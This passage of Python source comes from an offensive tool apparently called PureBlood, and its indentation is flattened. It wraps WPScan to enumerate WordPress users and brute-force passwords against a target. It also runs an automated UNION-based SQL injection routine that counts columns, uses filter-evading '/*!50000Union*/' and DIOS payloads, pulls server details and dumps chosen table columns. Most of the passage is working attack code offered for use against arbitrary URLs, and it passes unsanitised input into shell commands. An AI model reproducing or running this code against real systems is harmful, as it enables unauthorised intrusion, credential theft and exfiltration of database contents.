wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
def wp_scan_bruteforce(self, url):
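        """Brute-force WordPress credentials with WPScan: verify that ruby/WPScan
        are available (downloading wpscan-master on Windows if needed), update the
        WPScan database, then run it against the current target with a
        user-supplied username and password list."""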
wp_scan_test_ruby_command = subprocess.call('ruby --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
elif wp_scan_test_ruby_command == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
                subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
def auto_sql_injection(self, url):
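        """UNION-based SQL injection helper: confirm the injection point with a
        single quote, count columns via ORDER BY, locate the column reflected in
        the page with a DIOS payload, extract server information (hostname,
        version, users, directories), then dump user-selected table columns."""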
print ('[#] - Auto SQL Injection Running on -> {0}'.format(url))
auto_sql_injection_request_origin = requests.get(url)
auto_sql_injection_request_origin_html = BeautifulSoup(auto_sql_injection_request_origin.text, 'html.parser')
auto_sql_injection_request_origin_html_h1 = auto_sql_injection_request_origin_html.find_all('h1')
auto_sql_injection_request_origin_html_h2 = auto_sql_injection_request_origin_html.find_all('h2')
auto_sql_injection_request_origin_html_h3 = auto_sql_injection_request_origin_html.find_all('h3')
auto_sql_injection_request_origin_html_p = auto_sql_injection_request_origin_html.find_all('p')
print ('[~] - Checking If Vulnerable')
auto_sql_injection_request = requests.get('{0}\''.format(url))
auto_sql_injection_request_url = '{0}\''.format(url)
auto_sql_injection_request_result = ''
auto_sql_injection_request_i = ''
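        # Error-based check: a single quote is appended to the URL and the response
        # is matched against the known DBMS error signatures in dbms_errors.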
if auto_sql_injection_request.status_code == 200:
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(auto_sql_injection_request.text):
error = re.compile(error)
auto_sql_injection_request_result = 'Vulnerable1'
print ('[+] - Vulnerable: Database -> ({0})'.format(db))
if auto_sql_injection_request_result == '':
if auto_sql_injection_request_origin.text != auto_sql_injection_request.text:
auto_sql_injection_request_result = 'Vulnerable2'
print ('[+] - Vulnerable: NO Syntax Error')
elif auto_sql_injection_request.status_code == 403:
print ('[!] - Not Vulnerable!')
elif auto_sql_injection_request.status_code == 406:
print ('[!] - Not Vulnerable!')
if auto_sql_injection_request_result == 'Vulnerable1':
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
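            # Probe "order by 1" first to decide whether the payload needs a closing single quote.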
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
if ' order by 1--' in auto_sql_injection_request_orderby.text or 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, '100'))
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
elif 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err2'
else:
auto_sql_injection_orderby_result = 'err3'
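            # Increase the ORDER BY index until the "Unknown column"/"order clause" error
            # appears; the failing index minus one is the number of columns.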
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err2':
if 'mysql_fetch_row()' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[~] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
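            # Substitute a DIOS payload into each reflected numeric column until the
            # marker (id="PureBlood") shows up in the response.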
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
            auto_sql_injection_request_vulncolumn_nums = re.findall(r'\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Able to Find The Vulnerable Column!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
            print ('[+] Is Symlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
auto_sql_injection_request_dios_soup_pureblood_list = []
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
elif auto_sql_injection_request_result == 'Vulnerable2': # error_output() == False
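            # Blind path: no SQL error was shown, so compare the h1/h2/h3/p tags of the
            # original page with each ORDER BY response to detect when the page changes.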
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
if 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
                print ('[~] - mysql_fetch_row() error detected, omitting the single quote from the payload')
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} group by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[+] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
